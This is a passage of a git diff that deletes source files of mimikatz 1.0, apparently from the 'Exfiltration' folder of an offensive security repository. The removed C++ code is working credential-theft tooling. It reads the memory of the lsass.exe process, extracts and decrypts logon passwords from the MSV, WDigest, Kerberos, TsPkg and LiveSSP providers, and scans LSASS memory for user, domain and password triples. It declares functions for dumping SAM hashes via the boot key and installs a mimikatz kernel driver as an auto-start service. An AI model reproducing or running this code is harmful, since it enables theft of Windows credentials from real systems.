(*outputStream) << endl << - L"Rid : " << userF->UserId << endl << - L"User : " << wstring((wchar_t *) (&(userV->datas) + userV->Username.offset), userV->Username.lenght / sizeof(wchar_t)) << endl << - L"LM : " << hashLM << endl << - L"NTLM : " << hashNTLM << endl - ; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h deleted file mode 100644 index 6586d03..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.h +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_hive.h" -#include "mod_hash.h" -#include "mod_system.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_samdump -{ -private: - static bool getNControlSetFromHive(mod_hive::hive * theHive, string * rootKey, DWORD * nControlSet); - static bool getComputerNameFromHive(mod_hive::hive * theHive, string * fullControlSet, wstring * computerName); - - static bool getBootKeyFromHive(mod_hive::hive * theHive, string * fullControlSet, unsigned char bootkey[0x10]); - static bool getInfosFromHive(wstring systemHive, unsigned char bootkey[0x10]); - static bool getUsersAndHashesFromHive(wstring samHive, unsigned char bootkey[0x10]); - - static bool getBootKeyFromReg(BYTE bootkey[0x10]); - static bool getInfosFromReg(BYTE bootkey[0x10]); - static bool getUsersAndHashesFromReg(BYTE bootkey[0x10]); - - static void infosFromUserAndKey(mod_hash::USER_F * userF, mod_hash::USER_V * userV, BYTE hBootKey[0x20]); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool bootkey(vector<wstring> * arguments); - static bool full(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp deleted file mode 100644 index d8832bc..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.cpp +++ /dev/null @@ -1,348 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_sekurlsa.h" -#include "..\global.h" -HMODULE mod_mimikatz_sekurlsa::hLsaSrv = NULL; -HANDLE mod_mimikatz_sekurlsa::hLSASS = NULL; -mod_process::KIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa::localLSASRV, *mod_mimikatz_sekurlsa::pModLSASRV = NULL; -PLSA_SECPKG_FUNCTION_TABLE mod_mimikatz_sekurlsa::SeckPkgFunctionTable = NULL; - -bool mod_mimikatz_sekurlsa::lsassOK = false; -vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> mod_mimikatz_sekurlsa::GLOB_ALL_Providers; -vector<mod_mimikatz_sekurlsa::KIWI_MODULE_PKG_LSA> mod_mimikatz_sekurlsa::mesModules; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_sekurlsa::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_msv1_0::getMSV, L"msv", L"énumère les sessions courantes du provider MSV1_0")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_wdigest::getWDigest, L"wdigest", L"énumère les sessions courantes du provider WDigest")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_kerberos::getKerberos, L"kerberos",L"énumère les sessions courantes du provider Kerberos")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_tspkg::getTsPkg, L"tspkg", L"énumère les sessions courantes du provider TsPkg")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_livessp::getLiveSSP, L"livessp", L"énumère les sessions courantes du provider LiveSSP")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mod_mimikatz_sekurlsa_ssp::getSSP, L"ssp", L"énumère les sessions courantes du provider SSP (msv1_0)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(getLogonPasswords, L"logonPasswords", L"énumère les sessions courantes des providers disponibles")); - - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(searchPasswords, L"searchPasswords", L"rechere directement dans les segments mémoire de LSASS des mots de passes")); - return monVector; -} - -bool mod_mimikatz_sekurlsa::getLogonPasswords(vector<wstring> * arguments) -{ - if(searchLSASSDatas()) - getLogonData(arguments, &GLOB_ALL_Providers); - else - (*outputStream) << L"Données LSASS en erreur" << endl; - return true; -} - -bool mod_mimikatz_sekurlsa::loadLsaSrv() -{ - if(!hLsaSrv) - hLsaSrv = LoadLibrary(L"lsasrv"); - - if(mesModules.empty()) - { - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"lsasrv.dll", L"msv1_0", mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData, &pModLSASRV)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"tspkg.dll", L"tspkg", mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData, &mod_mimikatz_sekurlsa_tspkg::pModTSPKG)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"wdigest.dll", L"wdigest", mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, &mod_mimikatz_sekurlsa_wdigest::pModWDIGEST)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"kerberos.dll", L"kerberos", mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData, &mod_mimikatz_sekurlsa_kerberos::pModKERBEROS)); - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"msv1_0.dll", L"ssp", mod_mimikatz_sekurlsa_ssp::getSSPLogonData, &mod_mimikatz_sekurlsa_ssp::pModMSV)); - if(mod_system::GLOB_Version.dwBuildNumber >= 8000) - mesModules.push_back(KIWI_MODULE_PKG_LSA(L"livessp.dll",L"livessp", mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData, &mod_mimikatz_sekurlsa_livessp::pModLIVESSP)); - } - return (hLsaSrv != NULL); -} - -bool mod_mimikatz_sekurlsa::unloadLsaSrv() -{ - for(vector<KIWI_MODULE_PKG_LSA>::iterator testModule = mesModules.begin(); testModule != mesModules.end(); testModule++) - if(*testModule->pModuleEntry) - delete *testModule->pModuleEntry; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - mod_mimikatz_sekurlsa_keys_nt5::uninitLSASSData(); - else - mod_mimikatz_sekurlsa_keys_nt6::uninitLSASSData(); - - if(hLSASS) - CloseHandle(hLSASS); - if(hLsaSrv) - FreeLibrary(hLsaSrv); - - return true; -} - -bool mod_mimikatz_sekurlsa::searchLSASSDatas() -{ - if(!lsassOK) - { - if(!hLSASS) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring processName = L"lsass.exe"; - if(mod_process::getUniqueForName(&monProcess, &processName)) - { - if(hLSASS = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, false, monProcess.th32ProcessID)) - { - vector<mod_process::KIWI_VERY_BASIC_MODULEENTRY> monVecteurModules; - if(mod_process::getVeryBasicModulesListForProcess(&monVecteurModules, hLSASS)) - { - for(vector<mod_process::KIWI_VERY_BASIC_MODULEENTRY>::iterator leModule = monVecteurModules.begin(); leModule != monVecteurModules.end(); leModule++) - { - for(vector<KIWI_MODULE_PKG_LSA>::iterator testModule = mesModules.begin(); testModule != mesModules.end(); testModule++) - { - if((_wcsicmp(leModule->szModule.c_str(), testModule->moduleName) == 0) && !(*testModule->pModuleEntry)) - { - GLOB_ALL_Providers.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(testModule->enumFunc, testModule->simpleName/*wstring(L"msv1_0")*/)); - *testModule->pModuleEntry = new mod_process::KIWI_VERY_BASIC_MODULEENTRY(*leModule); - break; - } - } - } - } else { - (*outputStream) << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl; - CloseHandle(hLSASS); - hLSASS = NULL; - } - } else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl; - } else (*outputStream) << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl; - } - - if(hLSASS) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), hLsaSrv, &mesInfos, sizeof(MODULEINFO))) - { - localLSASRV.modBaseAddr = reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - localLSASRV.modBaseSize = mesInfos.SizeOfImage; - - if(!SeckPkgFunctionTable) - { - struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsaSrv, "LsaIRegisterNotification"), GetProcAddress(hLsaSrv, "LsaICancelNotification")}; - if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification) - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true); - } - - lsassOK = (mod_system::GLOB_Version.dwMajorVersion < 6) ? mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData() : mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData(); - } - } - } - return lsassOK; -} - -PLIST_ENTRY mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind) -{ - PLIST_ENTRY resultat = NULL; - BYTE * monBuffer = new BYTE[LUIDoffset + sizeof(LUID)]; - PLIST_ENTRY pStruct = NULL; - if(mod_memory::readMemory(pSecurityStruct, &pStruct, sizeof(pStruct), hLSASS)) - { - while(pStruct != pSecurityStruct) - { - if(mod_memory::readMemory(pStruct, monBuffer, LUIDoffset + sizeof(LUID), hLSASS)) - { - if(RtlEqualLuid(luidToFind, reinterpret_cast<PLUID>(reinterpret_cast<PBYTE>(monBuffer) + LUIDoffset))) - { - resultat = pStruct; - break; - } - } else break; - pStruct = reinterpret_cast<PLIST_ENTRY>(monBuffer)->Flink; - } - } - delete [] monBuffer; - return resultat; -} - -PVOID mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind) -{ - PVOID resultat = NULL; - RTL_AVL_TABLE maTable; - if(mod_memory::readMemory(pTable, &maTable, sizeof(RTL_AVL_TABLE), hLSASS)) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.RightChild), LUIDoffset, luidToFind); - return resultat; -} - -PVOID mod_mimikatz_sekurlsa::getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind) -{ - PVOID resultat = NULL; - RTL_AVL_TABLE maTable; - if(mod_memory::readMemory(pTable, &maTable, sizeof(RTL_AVL_TABLE), hLSASS)) - { - if(maTable.OrderedPointer) - { - BYTE * monBuffer = new BYTE[LUIDoffset + sizeof(LUID)]; - if(mod_memory::readMemory(maTable.OrderedPointer, monBuffer, LUIDoffset + sizeof(LUID), hLSASS)) - { - if(RtlEqualLuid(luidToFind, reinterpret_cast<PLUID>(reinterpret_cast<PBYTE>(monBuffer) + LUIDoffset))) - resultat = maTable.OrderedPointer; - } - delete [] monBuffer; - } - - if(!resultat && maTable.BalancedRoot.LeftChild) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.LeftChild), LUIDoffset, luidToFind); - if(!resultat && maTable.BalancedRoot.RightChild) - resultat = getPtrFromAVLByLuidRec(reinterpret_cast<PRTL_AVL_TABLE>(maTable.BalancedRoot.RightChild), LUIDoffset, luidToFind); - } - return resultat; -} - -void mod_mimikatz_sekurlsa::genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst, PDWORD pos) -{ - if(mesCreds) - { - if(mesCreds->Password.Buffer || mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer) - { - wstring userName = mod_process::getUnicodeStringOfProcess(&mesCreds->UserName, hLSASS); - wstring domainName = mod_process::getUnicodeStringOfProcess(&mesCreds->Domaine, hLSASS); - wstring password = mod_process::getUnicodeStringOfProcess(&mesCreds->Password, hLSASS, SeckPkgFunctionTable->LsaUnprotectMemory); - wstring rUserName = (isDomainFirst ? domainName : userName); - wstring rDomainName = (isDomainFirst ? userName : domainName); - - if(justSecurity) - { - if(!pos) - (*outputStream) << password; - else - (*outputStream) << endl << - L"\t [" << *pos << L"] { " << rUserName << L" ; " << rDomainName << L" ; " << password << L" }"; - } - else - { - if(!pos) - (*outputStream) << endl << - L"\t * Utilisateur : " << rUserName << endl << - L"\t * Domaine : " << rDomainName << endl << - L"\t * Mot de passe : " << password; - else - (*outputStream) << endl << - L"\t * [" << *pos << L"] Utilisateur : " << rUserName << endl << - L"\t Domaine : " << rDomainName << endl << - L"\t Mot de passe : " << password; - } - } - } else (*outputStream) << L"n.t. (LUID KO)"; -} - -bool mod_mimikatz_sekurlsa::getLogonData(vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders) -{ - PLUID sessions; - ULONG count; - - if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions))) - { - for (ULONG i = 0; i < count ; i++) - { - PSECURITY_LOGON_SESSION_DATA sessionData = NULL; - if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData))) - { - if(sessionData->LogonType != Network) - { - (*outputStream) << endl << - L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << - L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << - L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << - L"Domaine d\'authentification : " << mod_text::stringOfSTRING(sessionData->LogonDomain) << endl; - - for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) - { - (*outputStream) << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t'; - monProvider->first(&sessions[i], mesArguments->empty()); - (*outputStream) << endl; - } - } - LsaFreeReturnBuffer(sessionData); - } - else (*outputStream) << L"Erreur : Impossible d\'obtenir les données de session" << endl; - } - LsaFreeReturnBuffer(sessions); - } - else (*outputStream) << L"Erreur : Impossible d\'énumerer les sessions courantes" << endl; - - return true; -} - -bool mod_mimikatz_sekurlsa::ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine, BYTE **buffer) -{ - bool resultat = false; - BYTE * monBuffer = NULL; - PBYTE * leBuffer = buffer ? buffer : &monBuffer; - if(mod_process::getUnicodeStringOfProcess(maChaine, leBuffer, hLSASS)) - { - int flags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS; - if(resultat = (IsTextUnicode(*leBuffer, maChaine->Length, &flags) != 0)) - { - if(dstChaine) - dstChaine->assign(reinterpret_cast<const wchar_t *>(*leBuffer), maChaine->Length / sizeof(wchar_t)); - } - } - if(monBuffer) - delete[] monBuffer; - return resultat; -} - -bool mod_mimikatz_sekurlsa::searchPasswords(vector<wstring> * arguments) -{ - if(searchLSASSDatas()) - { - if(PNT_QUERY_SYSTEM_INFORMATION NtQuerySystemInformation = reinterpret_cast<PNT_QUERY_SYSTEM_INFORMATION>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation"))) - { -#ifdef _M_X64 - PBYTE MmSystemRangeStart = reinterpret_cast<PBYTE>(0xffff080000000000); -#elif defined _M_IX86 - PBYTE MmSystemRangeStart = reinterpret_cast<PBYTE>(0x80000000); -#endif - ULONG maTaille = 0; - NtQuerySystemInformation(KIWI_SystemMmSystemRangeStart, &MmSystemRangeStart, sizeof(PBYTE), &maTaille); - - DWORD nbPossible = 0; - for(PBYTE pMemoire = 0; pMemoire < MmSystemRangeStart ; ) - { - MEMORY_BASIC_INFORMATION mesInfos; - if(VirtualQueryEx(hLSASS, pMemoire, &mesInfos, sizeof(MEMORY_BASIC_INFORMATION)) > 0) - { - if((mesInfos.Protect & PAGE_READWRITE) && !(mesInfos.Protect & PAGE_GUARD) && (mesInfos.Type == MEM_PRIVATE)) - { - UNICODE_STRING donnees[3]; - for(PBYTE pZone = reinterpret_cast<PBYTE>(mesInfos.BaseAddress); pZone < (reinterpret_cast<PBYTE>(mesInfos.BaseAddress) + mesInfos.RegionSize - 3*sizeof(UNICODE_STRING)); pZone += sizeof(DWORD)) - { - if(mod_memory::readMemory(pZone, donnees, 3*sizeof(UNICODE_STRING), hLSASS)) - { - if( - (donnees[0].Length && !((donnees[0].Length & 1) || (donnees[0].MaximumLength & 1)) && (donnees[0].Length < sizeof(wchar_t)*0xff) && (donnees[0].Length <= donnees[0].MaximumLength) && donnees[0].Buffer) && - (donnees[1].Length && !((donnees[1].Length & 1) || (donnees[1].MaximumLength & 1)) && (donnees[1].Length < sizeof(wchar_t)*0xff) && (donnees[1].Length <= donnees[1].MaximumLength) && donnees[1].Buffer) && - (donnees[2].Length && !((donnees[2].Length & 1) || (donnees[2].MaximumLength & 1)) && (donnees[2].Length < sizeof(wchar_t)*0xff) && (donnees[2].Length <= donnees[2].MaximumLength) && donnees[2].Buffer) - ) - { - wstring user, domain, password; - BYTE * bPassword = NULL; - if(ressembleString(&donnees[0], &user) && ressembleString(&donnees[1], &domain) && !ressembleString(&donnees[2], NULL, &bPassword)) - { - if(bPassword) - { - mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(bPassword, donnees[2].MaximumLength); - password.assign(mod_text::stringOrHex(bPassword, donnees[2].Length, 0, false)); - } - (*outputStream) << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl; - } - - if(bPassword) - delete[] bPassword; - } - } - } - } - pMemoire += mesInfos.RegionSize; - } - else break; - } - } - } - else (*outputStream) << L"Données LSASS en erreur" << endl; - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h deleted file mode 100644 index aa05d58..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h +++ /dev/null @@ -1,64 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_memory.h" -#include "mod_process.h" -#include "mod_text.h" -#include "mod_system.h" -#include <iostream> -#include "secpkg.h" - -#include "LSA Keys/keys_nt5.h" -#include "LSA Keys/keys_nt6.h" - -#include "Security Packages/msv1_0.h" -#include "Security Packages/tspkg.h" -#include "Security Packages/wdigest.h" -#include "Security Packages/kerberos.h" -#include "Security Packages/livessp.h" -#include "Security Packages/ssp.h" - -class mod_mimikatz_sekurlsa -{ -public: - typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in bool justSecurity); -private: - typedef struct _KIWI_MODULE_PKG_LSA { - wchar_t * moduleName; - wchar_t * simpleName; - PFN_ENUM_BY_LUID enumFunc; - mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pModuleEntry; - _KIWI_MODULE_PKG_LSA(wchar_t * leModuleName, wchar_t * leSimpleName, PFN_ENUM_BY_LUID laEnumFunc, mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pLeModuleEntry) : moduleName(leModuleName), simpleName(leSimpleName), enumFunc(laEnumFunc), pModuleEntry(pLeModuleEntry) {} - } KIWI_MODULE_PKG_LSA, *PKIWI_MODULE_PKG_LSA; - - static bool lsassOK; - static vector<pair<PFN_ENUM_BY_LUID, wstring>> GLOB_ALL_Providers; - static vector<KIWI_MODULE_PKG_LSA> mesModules; - - static PVOID getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - static bool ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine = NULL, BYTE **buffer = NULL); - - static bool getLogonPasswords(vector<wstring> * arguments); - static bool searchPasswords(vector<wstring> * arguments); -public: - static HANDLE hLSASS; - static HMODULE hLsaSrv; - static mod_process::KIWI_VERY_BASIC_MODULEENTRY localLSASRV, *pModLSASRV; - static PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - - static PLIST_ENTRY getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind); - static PVOID getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - - static void genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst = false, PDWORD pos = NULL); - static bool getLogonData(vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders); - - static bool loadLsaSrv(); - static bool unloadLsaSrv(); - static bool searchLSASSDatas(); - - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp deleted file mode 100644 index 31fb6b5..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.cpp +++ /dev/null @@ -1,191 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_service.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_service::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les services et pilotes")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Démarre un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrête un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Supprime un service ou pilote")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(mimikatz, L"mimikatz", L"Installe et/ou démarre le pilote mimikatz")); - return monVector; -} - -bool mod_mimikatz_service::start(vector<wstring> * arguments) -{ - (*outputStream) << L"Démarrage de \'"; - return genericFunction(mod_service::start, arguments); -} - -bool mod_mimikatz_service::stop(vector<wstring> * arguments) -{ - (*outputStream) << L"Arrêt de \'"; - return genericFunction(mod_service::stop, arguments); -} - -bool mod_mimikatz_service::remove(vector<wstring> * arguments) -{ - (*outputStream) << L"Suppression de \'"; - return genericFunction(mod_service::remove, arguments); -} - -bool mod_mimikatz_service::genericFunction(PMOD_SERVICE_FUNC function, vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - (*outputStream) << arguments->front() << L"\' : "; - if(function(&arguments->front(), NULL)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"(null)\' - KO ; Nom de service manquant" << endl; - - return true; -} - - -bool mod_mimikatz_service::list(vector<wstring> * arguments) -{ - bool services_fs_drivers = true; - bool services = false; - bool fs = false; - bool drivers = false; - - bool allstate = true; - bool running = false; - bool stopped = false; - - vector<mod_service::KIWI_SERVICE_STATUS_PROCESS> * vectorServices = new vector<mod_service::KIWI_SERVICE_STATUS_PROCESS>(); - if(mod_service::getList(vectorServices, (arguments->empty() ? NULL : &arguments->front()))) - { - for(vector<mod_service::KIWI_SERVICE_STATUS_PROCESS>::iterator monService = vectorServices->begin(); monService != vectorServices->end(); monService++) - { - if( - ( - (services && (monService->ServiceStatusProcess.dwServiceType & (SERVICE_WIN32_OWN_PROCESS | SERVICE_WIN32_SHARE_PROCESS))) || - (fs && (monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER)) || - (drivers && (monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER)) || - (services_fs_drivers) - ) - && - ( - (running && monService->ServiceStatusProcess.dwCurrentState == SERVICE_RUNNING) || - (stopped && monService->ServiceStatusProcess.dwCurrentState == SERVICE_STOPPED) || - (allstate) - ) - ) - { - if(monService->ServiceStatusProcess.dwProcessId != 0) - (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId; - (*outputStream) << L'\t'; - - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS) - (*outputStream) << L"INTERACTIVE_PROCESS" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER) - (*outputStream) << L"FILE_SYSTEM_DRIVER" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER) - (*outputStream) << L"KERNEL_DRIVER" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_OWN_PROCESS) - (*outputStream) << L"WIN32_OWN_PROCESS" << L'\t'; - if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_SHARE_PROCESS) - (*outputStream) << L"WIN32_SHARE_PROCESS" << L'\t'; - - switch(monService->ServiceStatusProcess.dwCurrentState) - { - case SERVICE_CONTINUE_PENDING: - (*outputStream) << L"CONTINUE_PENDING"; - break; - case SERVICE_PAUSE_PENDING: - (*outputStream) << L"PAUSE_PENDING"; - break; - case SERVICE_PAUSED: - (*outputStream) << L"PAUSED"; - break; - case SERVICE_RUNNING: - (*outputStream) << L"RUNNING"; - break; - case SERVICE_START_PENDING: - (*outputStream) << L"START_PENDING"; - break; - case SERVICE_STOP_PENDING: - (*outputStream) << L"STOP_PENDING"; - break; - case SERVICE_STOPPED: - (*outputStream) << L"STOPPED"; - break; - } - - (*outputStream) << L'\t' << - monService->serviceName << L'\t' << - monService->serviceDisplayName << - endl; - } - } - } - else - (*outputStream) << L"mod_service::getList ; " << mod_system::getWinError() << endl; - - delete vectorServices; - return true; -} - -bool mod_mimikatz_service::mimikatz(vector<wstring> * arguments) -{ - if(SC_HANDLE monManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE)) - { - SC_HANDLE monService = NULL; - if(!(monService = OpenService(monManager, L"mimikatz", SERVICE_START))) - { - if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST) - { - (*outputStream) << L"[*] Pilote mimikatz non présent, installation." << endl; - - wstring monPilote = L"mimikatz.sys"; - wstring monPiloteComplet = L""; - if(mod_system::getAbsolutePathOf(monPilote, &monPiloteComplet)) - { - bool fileExist = false; - if(mod_system::isFileExist(monPiloteComplet, &fileExist) && fileExist) - { - if(monService = CreateService(monManager, L"mimikatz", L"mimikatz driver", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, monPiloteComplet.c_str(), NULL, NULL, NULL, NULL, NULL)) - { - (*outputStream) << L"[+] Création du pilote : OK" << endl; - if(mod_secacl::addWorldToMimikatz(&monService)) - (*outputStream) << L"[+] Attribution des droits : OK"; - else - (*outputStream) << L"[-] Attribution des droits : KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"[!] Impossible de créer le pilote ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[*] Pilote mimikatz déjà présent" << endl; - - if(monService) - { - if(StartService(monService, 0, NULL) != 0) - (*outputStream) << L"[+] Démarrage du pilote : OK"; - else - (*outputStream) << L"[-] Démarrage du pilote : KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - CloseServiceHandle(monService); - } - - CloseServiceHandle(monManager); - } - else (*outputStream) << L"[!] Impossible d\'ouvrir le gestionnaire de service pour création ; " << mod_system::getWinError() << endl; - return true; -}
